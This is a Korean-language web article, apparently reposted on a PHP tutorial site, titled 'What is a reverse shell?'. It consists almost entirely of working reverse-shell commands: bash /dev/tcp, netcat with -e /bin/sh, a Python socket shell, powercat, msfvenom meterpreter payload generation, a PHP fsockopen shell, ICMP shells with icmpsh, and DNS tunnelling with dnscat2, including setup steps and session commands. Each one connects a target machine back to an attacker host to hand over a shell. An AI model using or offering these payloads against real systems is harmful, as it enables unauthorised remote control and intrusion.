> 운영 및 유지보수 > 안전 > 리바운드 쉘은 무엇입니까?

리바운드 쉘은 무엇입니까?

王林
풀어 주다: 2023-05-18 22:01:04
앞으로
2120명이 탐색했습니다.

1.bash Bash

bash -i >& /dev/tcp/ip_address/port 0>&1
로그인 후 복사

리바운드 쉘은 무엇입니까?

2.nc Bounce

nc -e /bin/sh 192.168.2.130 4444
로그인 후 복사

리바운드 쉘은 무엇입니까?

3.python

import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.2.130" , 4444 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
로그인 후 복사

리바운드 쉘은 무엇입니까?

4.powercat

Import-Module .\powercat.ps1
powercat -c 192.168.2.130 -p 4444 -e cmd.exe
로그인 후 복사

리바운드 쉘은 무엇입니까?

5.msf 문

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.130 LPORT=4444 -f exe > shell.exe
로그인 후 복사

6 .php 리바운드 쉘

php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i &3 2>&3");'
로그인 후 복사

리바운드 쉘은 무엇입니까?

리바운드 쉘은 무엇입니까?

7.ICMP

关闭icmp响应,不然shell一直跳,恢复是0

sysctl -w net.ipv4.icmp_echo_ignore_all=1

python icmpsh_m.py 源 目标
python icmpsh_m.py 192.168.2.137 192.168.2.135
로그인 후 복사

windows7에서 실행:

icmpsh.exe -t 192.168.2.137
로그인 후 복사

리바운드 쉘은 무엇입니까?

리바운드 쉘은 무엇입니까?

8.DNS

https://downloads.skullsecurity.org/d nscat2/

여기에서 다운로드한 dnscat2를 사용합니다. dnscat2는 Windows 및 Linux 버전, 서버 및 클라이언트로 구분됩니다.

그리고 컴파일하려면 vs2008을 사용하는 것이 좋습니다

install

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2
cd server
sudo gem install bundler
bundle install
sudo ruby ./dnscat2.rb
로그인 후 복사

kali

ruby dnscat2.rb --dns host=0.0.0.0,port=53531
ruby dnscat2.rb --dns server=23.105.193.106,port=533,type=TXT --secret=123456(密钥)
ruby dnscat2.rb xxx.com
로그인 후 복사

windows7:

./dnscat --dns server=192.168.2.130,port=53531
./dnscat --dns server=192.168.2.130,port=53531 --secret=qwer1234(密钥)
./dnscat xxx.com
로그인 후 복사

연결 성공 후

리바운드 쉘은 무엇입니까?

리바운드 쉘은 무엇입니까?

기록 보기

리바운드 쉘은 무엇입니까?

연결 선택

리바운드 쉘은 무엇입니까?

쉘 사용

리바운드 쉘은 무엇입니까?

쉘 선택으로 돌아가기

리바운드 쉘은 무엇입니까?

명령 실행

리바운드 쉘은 무엇입니까?

기타 명령

quit (退出控制台)
kill <id> (中断通道)
set(设值,比如设置security=open)
windows(列举出所有的通道)
window -i <id>(连接某个通道)
连接通道后,使用help同样可以看到其内支持的命令(单个命令后跟-h也会解释该命令):

clear(清屏)
delay(修改远程会话超时时间)
exec(执行远程机上的程序)
shell(得到一个反弹shell)
download/upload(两端之间上传下载文件)
supend(返回到上一层,等于快捷键ctrl+z)</id></id>
로그인 후 복사

DNS 터널 전달

listen 127.0.0.1:6666 192.168.2.135:80
本机的6666就可以访问80端口
로그인 후 복사

위 내용은 리바운드 쉘은 무엇입니까?의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:yisu.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿